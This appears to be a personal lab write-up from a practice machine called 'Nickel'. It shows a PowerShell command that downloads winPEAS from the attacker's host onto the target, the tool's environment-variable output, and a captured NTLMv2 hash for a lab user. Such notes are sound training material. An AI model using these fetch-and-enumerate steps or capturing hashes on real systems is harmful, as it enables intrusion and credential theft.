InfoSec LAB

Nickel_Automated

Created: 2 min read

PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\Users\ariah> iwr -Uri http://192.168.45.153/winPEASx64.exe -OutFile .\winPEASx64.exe

Delivery complete

Executing PEAS

ENV

╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables 
    SystemDrive: C:
    ProgramFiles(x86): C:\Program Files (x86)
    Path: C:\Program Files\OpenSSH\OpenSSH-Win64;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\
WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Use
rs\ariah\AppData\Local\Microsoft\WindowsApps;
    ProgramW6432: C:\Program Files
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    TMP: C:\Users\ariah\AppData\Local\Temp
    PROCESSOR_ARCHITECTURE: AMD64
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PROCESSOR_REVISION: 0101
    TEMP: C:\Users\ariah\AppData\Local\Temp
    USERPROFILE: C:\Users\ariah
    USER: ariah
    TERM: xterm-256color
    USERNAME: ariah
    SystemRoot: C:\Windows
    CommonProgramFiles: C:\Program Files\Common Files
    LOGNAME: ariah
    ProgramData: C:\ProgramData
    HOMEPATH: \Users\ariah
    COMPUTERNAME: NICKEL
    ALLUSERSPROFILE: C:\ProgramData
    SSH_CONNECTION: 192.168.45.153 45852 192.168.219.99 22
    SHELL: c:\windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    HOMEDRIVE: C:
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    OS: Windows_NT
    ProgramFiles: C:\Program Files
    ComSpec: C:\Windows\system32\cmd.exe
    HOME: C:\Users\ariah
    PSModulePath: C:\Users\ariah\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\sy
stem32\WindowsPowerShell\v1.0\Modules
    PROMPT: ariah@NICKEL $P$G
    SSH_CLIENT: 192.168.45.153 45852 22
    APPDATA: C:\Users\ariah\AppData\Roaming
    USERDOMAIN: WORKGROUP
    PROCESSOR_LEVEL: 25
    LOCALAPPDATA: C:\Users\ariah\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    SSH_TTY: windows-pty
    PSExecutionPolicyPreference: Bypass
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\Syst
em32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS

LSA Protection

Credentials Guard

Cached Creds

UAC

PowerShell

C:\Users\ariah\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

NTLM

ariah::NICKEL:1122334455667788:0e1cb50fb765f7952688d9ba14828230:01010000000000008c7b94d60b8edb017e5b76830be825be000000000800300030000000000000000000000000200000dc8dc6ff2916f75b4e8f9150c1df89971f66c4c75915bc8ef5fde82171dfe73b0a00100000000000000000000000000000000000090000000000000000000000

Network

Interactive Graph View

Backlinks